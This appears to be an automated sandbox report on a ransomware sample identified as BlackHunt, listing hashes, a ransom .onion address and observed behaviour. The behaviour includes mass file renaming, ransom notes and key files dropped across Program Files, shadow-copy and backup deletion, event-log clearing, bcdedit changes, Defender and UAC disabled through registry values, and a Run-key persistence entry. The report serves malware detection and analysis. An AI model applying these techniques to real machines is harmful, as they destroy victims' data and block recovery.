Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 22:24
Static task
static1
Behavioral task
behavioral1
Sample
063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe
Resource
win10v2004-20231215-en
General
-
Target
063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe
-
Size
707KB
-
MD5
270b64f87b25e6d75386bfaa1a354ef1
-
SHA1
28decb2e4e385beebbff26d73ab49208717c7543
-
SHA256
063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce
-
SHA512
f38cf2d1a4998a3b4d991e29f5ab50241611085c263c51a7f02463c15cc70fdc15e9828317e2d73176279e5c793b646d215ef950d4531bcf1eaf464cbdeb2014
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza158Uvnh:6uaTmkZJ+naie5OTamgEoKxLWcqh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5436 fsutil.exe 4864 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 8052 wevtutil.exe 5724 wevtutil.exe 6032 wevtutil.exe 5680 wevtutil.exe 7176 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 6760 bcdedit.exe 6772 bcdedit.exe 6600 bcdedit.exe 4876 bcdedit.exe -
Renames multiple (3371) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 7028 wbadmin.exe 4520 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\E: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\V: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\R: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\G: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\Z: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\N: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\Y: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\P: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\J: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\L: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\M: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\S: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\H: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\I: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\O: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\B: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\U: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\K: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\X: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\T: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened (read-only) \??\A: 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\is.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#BlackHunt_ReadMe.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_filter\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\#BlackHunt_ReadMe.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\images\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\pkcs11wrapper.md 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\VideoLAN\VLC\plugins\logger\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ar-ae\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hu-hu\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\AddClear.mp3 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\ui-strings.js 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ko-kr\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-il\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-tw\#BlackHunt_ReadMe.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\it-it\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\#BlackHunt_ReadMe.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\it-it\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_filetype_psd.svg 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-tw\ui-strings.js 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\eu-es\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\libxml2.md 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\giflib.md 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\Java\jre-1.8\lib\ext\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\#BlackHunt_ReadMe.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\jfr\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\management\management.properties 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\he-il\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\#BlackHunt_ReadMe.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\ui-strings.js 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\#BlackHunt_ReadMe.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sk-sk\#BlackHunt_ReadMe.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fi-fi\ui-strings.js 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sk-sk\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fi-fi\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\de-de\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fr-fr\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\#BlackHunt_ReadMe.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sk-sk\#BlackHunt_ReadMe.txt 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\#BlackHunt_Private.key 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int.gif 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons.png 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\ui-strings.js 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-down.svg 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\icons.png 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_ko.properties 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_output\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe File created C:\Program Files\dotnet\shared\#BlackHunt_ReadMe.hta 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6744 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4284 vssadmin.exe 6656 vssadmin.exe 6372 vssadmin.exe 6668 vssadmin.exe 624 vssadmin.exe 996 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 5268 taskkill.exe -
Modifies registry class 13 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 6696 PING.EXE -
Suspicious behavior: EnumeratesProcesses 36 IoCs
pid Process 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Token: SeRestorePrivilege 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Token: SeBackupPrivilege 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Token: SeTakeOwnershipPrivilege 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Token: SeAuditPrivilege 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Token: SeSecurityPrivilege 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Token: SeIncBasePriorityPrivilege 3080 063d1b0005db11df05b87cb94f4684353cc559f8ea0e5447b758ea2a81860bce.exe Token: SeBackupPrivilege 6728 vssvc.exe Token: SeRestorePrivilege 6728 vssvc.exe Token: SeAuditPrivilege 6728 vssvc.exe Token: SeBackupPrivilege 5752 wbengine.exe Token: SeRestorePrivilege 5752 wbengine.exe Token: SeSecurityPrivilege 5752 wbengine.exe Token: SeSecurityPrivilege 8052 wevtutil.exe Token: SeBackupPrivilege 8052 wevtutil.exe Token: SeSecurityPrivilege 5724 wevtutil.exe Token: SeBackupPrivilege 5724 wevtutil.exe Token: SeSecurityPrivilege 6032 wevtutil.exe Token: SeBackupPrivilege 6032 wevtutil.exe Token: SeSecurityPrivilege 5680 wevtutil.exe Token: SeBackupPrivilege 5680 wevtutil.exe Token: SeSecurityPrivilege 7176 wevtutil.exe Token: SeBackupPrivilege 7176 wevtutil.exe Token: SeDebugPrivilege 5268 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
